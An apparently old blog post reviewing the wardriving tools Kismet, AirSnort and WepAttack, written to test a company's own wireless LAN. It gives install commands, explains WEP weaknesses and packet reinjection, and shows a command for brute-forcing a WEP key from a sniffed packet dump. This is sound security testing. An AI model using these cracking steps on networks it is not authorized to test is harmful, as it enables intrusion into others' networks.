To check how secure our companys Wireless LAN is I tried different wardriving tools. Here is a short roundup.

Hallo!!! Kismet scans for available networks and gives you some interesting information about them.

#> apt-get -t testing install kismet

You may need to edit the /etc/kismet/kismet.conf to match your wireless NIC and the driver you use. I'm running the hostap driver on my Netgear MA401 (Prism 2.5) so this is the line I use:

source=prism2_hostap,wlan0,prism2source

You need to be root to run kismet. When started it gathers information about the available networks in an “Autofit” called mode. To actually select an interesting network (eg. your own) press s to sort the list by a key of your choice, then select the network and press i for more information.

Make sure your network has WEP encryption enabled. It is possible to hide the name of your network (SSID hiding) – however kismet will detect it nontheless it will show it as “cloaked”.

Kismet logs received packets to /var/log/kismet/ which will come in handy later.

The next tool to use is AirSnort. This is a GTK based networksniffer similar to kismet but able to break WEP encryption. Install it and run it as root.

#> apt-get -t testing install airsnort

Some theory first. WEP uses the RC4 Algorithm which isn't the safest in world. In fact it has some known security flaws which are described elsewhere. Simply put, there are a few thousand keys which are weak and easy to decrypt. A few years ago you just had to run a tool like AirSnort to crack WEP encrption in a few minutes by fetching these weak keys from the air.

Well nowadays all manufactuers have changed their WEP implementations to avoid these weak keys so AirSnort will need a large amount of Packets to get the WEP password. If you get a lot of “interesting” packets in AirSnort you know there is some old Hardware in your net which needs to be updated.

Update: I haven't tried it yet but there is a simple way to get the huge amount of packets you need: Capture a few (correctly encrypted) packetets from the air and then reinject them in the network. Other hosts will answer generating the wanted traffic to sniff. So if you need to protect important stuff do not rely on WEP!

Even if the manufacturers don't use the weak keys in WEP anymore there is room for an simple attack: Using brute force to guess the WEP password. The interesting thing is that this can be done completely undetected. All that is needed is a single passively sniffed packet.

Lets install the tool first. Get it from http://wepattack.sourceforge.net and unpack it. For compiling you need some libraries, too.

#> apt-get -t testing install libssl-dev libpcap-dev
$> tar -xzvf WepAttack-0.1.3.tar.gz
$> cd WepAttack-0.1.3/src/
$> make
#> cp wepattack /usr/local/bin/

To brute force attack a WEP encrypted packet you need a wordlist (available from the above site) and a packet dump from kismet. Then just run the following command.

$> wepattack -f /var/log/kismet/Kismet-<date>-<num>.dump -w wordlist

If this finds your password it is too weak.

If your WLAN passes all these tests it should be considerably safe from most occasional crackers. At our company all traffic to the internal LAN is additionally encrypted by IPSEC, but for a home network this may be fine enough even without using stronger encryption.